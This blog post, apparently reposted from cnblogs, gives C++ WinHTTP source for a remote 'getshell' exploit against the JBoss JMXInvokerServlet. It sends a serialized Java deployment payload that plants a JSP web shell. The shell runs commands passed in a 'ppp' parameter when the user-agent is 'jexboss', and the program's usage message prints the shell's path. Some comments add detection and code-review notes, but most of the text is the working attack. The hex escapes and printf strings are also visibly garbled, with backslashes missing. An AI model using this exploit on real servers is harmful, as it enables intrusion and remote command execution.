  • Jboss remote getshell (JMXInvokerServlet) vc版

    #include "stdafx.h"
    #include <Windows.h>
    #include <stdio.h>
    #include <winhttp.h>
    #include <comdef.h>
    #pragma comment (lib,"Winhttp.lib")
    
    // Request body that request_http()/request_https() POST verbatim to
    // /invoker/JMXInvokerServlet, written here as one hex escape per byte.
    // The leading bytes are the Java serialization stream magic (ac ed 00 05)
    // and the first class name in the stream decodes to
    // org.jboss.invocation.MarshalledInvocation; the JSP path in the trailing
    // comment is the one main() prints as the expected result location.
    // Defender note: an unauthenticated POST to this servlet carrying
    // Content-Type application/x-java-serialized-object and a body that
    // starts with the serialization magic is the signature of this technique.
    // The server-side fix is to remove or put authentication in front of the
    // JBoss invoker servlets; at the network layer, match on the path plus
    // the magic bytes at the start of the body.
    char shell_invoke[] = ( 
        "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
        "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
        "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
        "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
        "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
        "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
        "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
        "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
        "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
        "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
        "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
        "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
        "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
        "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
        "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
        "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
        "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
        "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
        "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
        "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
        "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
        "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
        "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
        "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
        "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
        "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
        "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
        "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
        "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
        "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
        "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
        "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
        "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
        "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
        "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
        "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
        "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
        "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
        "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
        "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
        "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
        "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
        "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
        "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
        "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
        "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
        "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
        "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
        "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
        "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
        "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
        "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
        "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
        "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
        "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
        "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
        "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
        "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
        "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
        "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
        "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
        "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
        "x00x04x70x78");
    
    // POST shell_invoke to https://Host:port/invoker/JMXInvokerServlet over
    // TLS (WINHTTP_FLAG_SECURE). The response is never read; only WinHTTP
    // failure codes are printed, and nothing is returned, so the caller
    // cannot tell whether the request was actually sent.
    //   Host  wide-string server name, handed to WinHttpConnect unchanged
    //   port  TCP port, handed to WinHttpConnect unchanged
    void request_https(wchar_t* Host,int port)
    {
        DWORD dwSize = 0;          // unused
        DWORD dwDownloaded = 0;    // unused
        LPSTR pszOutBuffer;        // unused, and never initialised
        BOOL bResults = FALSE;
        HINTERNET hSession = NULL,
            hConnect = NULL,
            hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen( L"WinHTTP Example/1.0",
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME,
            WINHTTP_NO_PROXY_BYPASS, 0);
    
        // Specify an HTTP server.
        if (hSession)
            hConnect = WinHttpConnect( hSession,Host,
            port, 0);
    
        // Create an HTTP request handle.
        if (hConnect)
            hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
            NULL, WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE);
    
        // These three bits turn off server-certificate validation entirely
        // (unknown CA, wrong CN, expired): the peer is not authenticated, so
        // any host presenting any certificate is accepted.
        DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
            SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
            SECURITY_FLAG_IGNORE_UNKNOWN_CA ;
    
        // The Content-Type names the JBoss class the servlet will deserialize
        // the body as; this header is the easiest thing for a WAF to key on.
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        // NOTE(review): unlike the call above, this one and WinHttpSetOption
        // below are not guarded by `if( hRequest )`, so they run with a NULL
        // handle when WinHttpOpenRequest failed.
        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
            (LPVOID)&options, sizeof (DWORD) );
    
        // bResults only reflects the WinHttpSetOption call at this point
        // (each call overwrites it); the message text says QueryOption but
        // the failing call is SetOption. GetLastError() returns a DWORD, for
        // which %ld is the wrong specifier (%lu).
        if(bResults == FALSE){
            printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
    ",GetLastError());
        }
    
        // Send a request. The body is the whole shell_invoke array;
        // sizeof() counts the literal's terminating NUL, so one extra byte
        // goes out, and the C++ functional cast WORD(...) narrows the byte
        // count to 16 bits.
        if (hRequest){
            bResults = WinHttpSendRequest( hRequest,
                WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                shell_invoke, WORD(sizeof(shell_invoke)),
                sizeof(shell_invoke), 0);
            if(bResults == FALSE)
                printf ("WinHttpSendRequest error: %ld
    ",GetLastError());
        }
    
        // Close open handles in reverse order of creation.
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
    }
    
    
    // POST shell_invoke to http://Host:Port/invoker/JMXInvokerServlet in the
    // clear (no WINHTTP_FLAG_SECURE). Same request as request_https() minus
    // TLS, with a browser-style User-Agent on the session. The response is
    // never read and nothing is returned to the caller.
    //   Host  wide-string server name, handed to WinHttpConnect unchanged
    //   Port  TCP port, handed to WinHttpConnect unchanged
    void request_http(wchar_t* Host, int Port)
    {
        DWORD dwSize = sizeof(DWORD);   // unused
        DWORD dwStatusCode = 0;         // unused
        BOOL  bResults = FALSE;
        HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle. The User-Agent is set
        // to look like a desktop browser; a defender correlating UA strings
        // with the serialized-object Content-Type below will see the mismatch.
        hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME, 
            WINHTTP_NO_PROXY_BYPASS,
            0 );
    
        // Specify an HTTP server.
        if( hSession )
            hConnect = WinHttpConnect( hSession,
            Host,
            Port,
            0 );
    
        // Create an HTTP Request handle.
        if( hConnect )
            hRequest = WinHttpOpenRequest( hConnect,
            L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
            NULL,
            WINHTTP_NO_REFERER, 
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            0 );
        // Add a request header. Only the first call below is inside the
        // `if( hRequest )`; the second is indented as though it were, but
        // it is a separate statement and runs even when hRequest is NULL.
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
            bResults = WinHttpAddRequestHeaders( hRequest, 
                L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
        // Send a Request, gated on the result of the last header call only.
        // sizeof(shell_invoke) includes the literal's terminating NUL, and
        // WORD(...) narrows the byte count to 16 bits.
        if( bResults ) 
            bResults = WinHttpSendRequest( hRequest, 
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            shell_invoke,WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke),
            0 );
    
        // Report any errors. GetLastError() returns a DWORD; %d is the wrong
        // specifier for it (%lu).
        if( !bResults )
            printf( "Error %d has occurred.
    ", GetLastError( ) );
    
        // Close open handles in reverse order of creation.
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
    }
    
    // Entry point: argv[1] host, argv[2] port, argv[3] "http" or "https".
    // Prints usage and returns -1 when fewer than three arguments are given;
    // returns 0 after dispatching to request_http()/request_https(), and
    // also 0 (after a message) for an unrecognised protocol word.
    int main(int argc, char* argv[])
    {
    
        if (argc < 4)
        {
            printf("[*]:%s Jboss Exploit remote getshell
    ",argv[0]);
            printf("[*]:%s Remote_Host Remote_ip http/https 
    ",argv[0]);
            printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
    ");
            return -1;
        }
        // Widen the narrow argv strings (%S in wsprintfW converts from the
        // ANSI code page). wsprintfW takes no destination size: an argument
        // longer than MAX_PATH-1 characters overruns these stack buffers
        // (wsprintf's own ceiling is 1024 characters, not the buffer size).
        wchar_t Host[MAX_PATH] = {0};
        wchar_t procotol[MAX_PATH] = {0};   // sic: "protocol"
        wsprintfW(Host, L"%S", argv[1]);
        wsprintfW(procotol,L"%S",argv[3]);
        printf("
    [*]:Host:%S procotol:%S 
    ", Host,procotol);
    
        // lstrcmpi is case-insensitive; with wchar_t arguments this
        // presumably resolves to lstrcmpiW under a UNICODE build.
        // atoi() gives no error indication: a non-numeric port becomes 0.
        if (0 == lstrcmpi(procotol, L"http"))
        {
            request_http(Host,atoi(argv[2]));
    
        }else if(0 == lstrcmpi(procotol, L"https"))
        {
            request_https(Host,atoi(argv[2]));
        }else
        {
            printf("
    Unknown option.
    ");
            return 0;
        }
        return 0;
    }

  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html